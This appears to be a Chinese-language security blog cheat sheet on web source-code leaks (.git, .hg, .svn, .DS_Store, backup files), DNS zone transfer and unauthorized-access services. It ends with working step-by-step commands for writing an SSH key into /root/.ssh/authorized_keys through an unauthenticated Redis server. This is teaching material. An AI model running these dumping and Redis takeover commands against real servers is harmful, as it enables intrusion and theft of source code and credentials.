web源碼泄漏
.hg源碼泄漏:
漏洞成因:hg init的時候會生成.hg,http://www.xx.com/.hg/,
工具:dvcs-ripper,(rip-hg.pl -v -u http://www.xx.com/.hg/)
.git源碼泄漏:
漏洞成因:在運行git init初始化代碼庫的時候,會在當前目錄下產生一個.git的隱藏文件,用來記錄代碼的變更記錄等,沒有刪除這個文件,導致泄漏,http://www.xxx.com/.git/config
工具:GitHack,dvcs-ripper,(GitHack.py http://www.xxx.com/.git,rip-hg.pl -v -u http://www.xx.com/.git/)
.DS_Store源碼泄漏:
漏洞成因:在發布代碼時,沒有刪除文件夾中隱藏的.DS_store,被發現后,獲取了敏感的文件名等信息,http://www.xxx.com/.ds_store
工具:dsstoreexp,(python ds_store_exp.py http://www.xxx.com/.DS_Store)
網站備份壓縮文件:
在網站的使用過程中,往往需要對網站中的文件進行修改,升級,此時就需要對網站整或其中某一頁面進行備份,當備份文件或修改過程中的緩存文件因為各種原因被留在網站web目錄下,而該目錄又沒有設置訪問權限,就有可能導致備份文件被下載,導致信息泄漏,給服務器安全埋下隱患。.rar, .zip, .7z, .tar.gz, .bak, .swp, .txt, .html,
工具:可以使用一些掃描軟件,進行掃描,如awvs之類的
像.swp文件,就是vim源文件泄漏,/.index.php.swp或/index.php~ 可以直接用vim -r inde.php來讀取文件
SVN導致文件泄漏:
版本控制系統
工具:dvcs-ripper,Seay-Svn,(rip-svn.pl -v -u http://www.xxx.com/.svn/)
應用層泄漏
DNS域傳送:
dns服務器的主備數據同步,使用的是域傳送功能,如果使用默認配置文件進行配置,就會存在dns域傳送漏洞(不手動添加allow-transfer)
工具:dig @1.1.1.1 xxx.com axfr (會泄漏一些信息)
HeartBleed:
利用https
從堆棧錯誤泄漏到RCE:
利用報錯,泄漏信息,利用函數try{....}catche(e){e.printstack;}
未授權訪問漏洞:
未授權訪問----應用層服務的問題,服務啟動后,沒配置任何憑證,導致可以直接進入
弱口令---配置的密碼過於簡單常見
空口令---沒配置密碼
目前主要存在未授權訪問漏洞的如下:
NFS,Samba,LDAP,Rsync,FTP,Gitlab,Jenkins,MongoDB,Redis,ZooKeeper,
ElasticSearch,Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo等,這些都是挖礦勒索的高發地帶
如:
redis為授權訪問漏洞,默認情況下會綁定在0.0.0.0:6379,這樣會將redis服務暴露到公網上,如果沒有開啟認證的情況下,可以導致任意用戶可以訪問目標服務器,可以利用相關方法,在redis服務器上寫入公鑰,進而可以使用對應私鑰直接登陸目標服務器。
1.本地生成公鑰私鑰
ssh-keygen -t rsa
2.把公鑰寫入xx.txt文件
(echo -e "\n\n";cat id_rsa.pub;echo -e "\n\n") > xx.txt
3.連接redis寫入文件
cat xx.txt | redis-cli -h 192.168.1.2 -x set crackit
redis-cli -h 192.168.1.2
192.168.1.2:6379> config set dir /root/.ssh/
192.168.1.2:6379> config get dir
1)"dir"
2)"/root/.ssh"
192.168.1.2:6379> config set dbfilename "authorized_keys"
192.168.1.2"6379> save
也可以使用msf里面成熟的exp來利用
友情鏈接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn